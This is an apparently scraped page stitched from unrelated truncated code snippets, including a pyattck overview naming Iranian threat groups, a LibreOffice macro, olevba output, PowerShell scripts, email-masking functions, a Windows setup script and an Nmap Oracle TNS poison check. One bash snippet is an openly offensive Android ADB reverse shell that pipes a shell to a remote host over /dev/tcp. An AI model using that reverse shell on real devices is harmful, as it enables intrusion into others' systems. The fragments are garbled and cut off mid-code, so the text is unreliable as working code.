Overview
The following content is generated using a preview release of Swimlane's pyattck.
This snippet of data is scoped to the following actor groups:
- APT33
- APT34
- APT39
- Charming Kitten
The following content is generated using a preview release of Swimlane's pyattck.
This snippet of data is scoped to the following actor groups:
sub StraightQuotes2CurlyQuotes | |
' Kudos to David for main code: https://gist.github.com/dajare/3924560 | |
' Kudos to Villeroy for simpler, better find patterns: | |
' https://forum.openoffice.org/en/forum/viewtopic.php?f=30&t=39902 | |
' Kudos to Kaloian Droganov for how to make the macro atomic: | |
' http://stackoverflow.com/questions/853372/how-to-make-a-macro-atomic | |
rem ---------------------------------------------------------------------- | |
dim document as object | |
dim dispatcher as object | |
dim undo as object |
olevba 0.54.2 on Python 3.7.3 - http://decalage.info/python/oletools | |
=============================================================================== | |
FILE: a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740 | |
Type: OpenXML | |
------------------------------------------------------------------------------- | |
VBA MACRO ThisWorkbook.cls | |
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook' | |
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
(empty macro) | |
------------------------------------------------------------------------------- |
param( | |
[string]$baseDir = "C:\SomeFolderToStoreTheData\", | |
[string]$bw_client = "000", | |
[string]$bw_user = "YOURUSERNAME", | |
[string]$bw_password = "YOURPASSWORD", | |
[string]$filePath = "Path to Analysis Office Excel.xlsx", | |
[string]$year_column = "Analysis Technical Name of Year column" | |
) | |
# Essentially the Powershell version of https://blogs.sap.com/2016/12/18/automated-updating-of-data-in-excel-files-bex-ao-via-vbavbscript/ |
#!/bin/bash | |
# Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first. | |
# By Random_Robbie | |
adb connect $1:5555 | |
adb shell sh -i >& /dev/tcp/$2/4444 0>&1 | |
echo "[*] Should have a shell now ..... Be nice :) [*]" |
/* Not sure if this has any effect against email scraping bots but it's an idea. | |
It just outputs the string as an array of character codes, then restores it | |
real characters after the page loads. With javascript disabled we fail. :( */ | |
// PHP function /////////////////////////////////// | |
function mask($str) { | |
$mask = ""; | |
for($c=0;$c<strlen($str);$c++) { | |
$mask .= "" . ord($str[$c]) . ","; | |
} |
/* | |
Create a Mask in an email address | |
This function create a mask using a valid email address. | |
This is usefull when someone need to confirm the email used in a system | |
Author: Gabriel Froes - https://gist.github.com/gabrielfroes | |
*/ | |
function emailMask(email) { | |
var maskedEmail = email.replace(/([^@\.])/g, "*").split(''); | |
var previous = ""; | |
for(i=0;i<maskedEmail.length;i++){ |
filter Expand-DefenderAVSignatureDB { | |
<# | |
.SYNOPSIS | |
Decompresses a Windows Defender AV signature database (.VDM file). | |
.DESCRIPTION | |
Expand-DefenderAVSignatureDB extracts a Windows Defender AV signature database (.VDM file). This function was developed by reversing mpengine.dll and with the help of Tavis Ormandy and his LoadLibrary project (https://github.com/taviso/loadlibrary). Note: Currently, "scrambled" databases are not supported although, I have yet to encounter a scrambled database. Thus far, all databases I've encountered are zlib-compressed. |
########## | |
# Win10 Initial Setup Script | |
# Author: Disassembler, Gr1d:, TheRoc | |
# Edited by Gr1D: | |
# dasm's script: https://github.com/Disassembler0/Win10-Initial-Setup-Script/ | |
# TheROC's E.T. Disable script: https://gist.github.com/thoroc/86d354d029dda303598a | |
# THIS IS VERSION 5.5, error suppression is turned on. PLEASE be patient and PLEASE restart after running the script. | |
# This script leaves more MS defaults on, including MSE and smart-screen, | |
# but blocks a ton of domains and disables remote assistance secures java, sets up ipsec.. |
local bin = require "bin" | |
local io = require "io" | |
local nmap = require "nmap" | |
local shortport = require "shortport" | |
local stdnse = require "stdnse" | |
local table = require "table" | |
description = [[ | |
Simple module to test Oracle DB server for TNS Poison vulnerability. | |
Module sends to server a packet with command to register new TNS Listener and check response |